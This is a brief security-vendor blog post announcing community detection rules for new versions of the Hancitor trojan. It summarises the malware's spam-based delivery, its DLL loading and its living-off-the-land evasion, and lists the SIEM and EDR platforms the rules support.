Today’s post is about fresh versions of Hancitor trojan and a couple of rules released by Threat Bounty Program participants which enables security solutions to detect them.
Hancitor Trojan (Evasion Technique) community rule by Emir Erdogan: https://tdm.socprime.com/tdm/info/GwJ4Y7k7tzaz/1rBKXHMBSh4W_EKGF2on/?p=1
Hancitor infection with Ursnif exclusive rule by Osman Demir: https://tdm.socprime.com/tdm/info/DXrFgt0kTBg1/Z9TBUXMBPeJ4_8xc-IFm/
This malware appeared in 2013 and at the end of last year was significantly modified by the authors, who managed to turn the outdated Trojan into an evasive threat. Cybercriminals infect their victims primarily via various spam email campaigns. Hancitor trojan is designed to attack Windows systems, and attackers use it to deliver the next stage payload. The new version of this malware was used most of all in attacks against users and organizations from the United States, and their other targets are located in Canada, Southern and Central Americas, Europe, and APAC region. One of the most notable changes in the malware is the capability of downloading and executing a DLL module. Also, malware authors have significantly modified the network communication protocol used.
In recent campaigns, cybercriminals leveraged an effective combination of Living off the Land Techniques in order to evade detection. They used WMI for indirect command execution and COM objects to download stage-two binaries in Proxy and Non-Proxy environments.
The rules have translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Execution, Discovery
Techniques: PowerShell (T1086), Windows Management Instrumentation (T1047), Query Registry (T1012)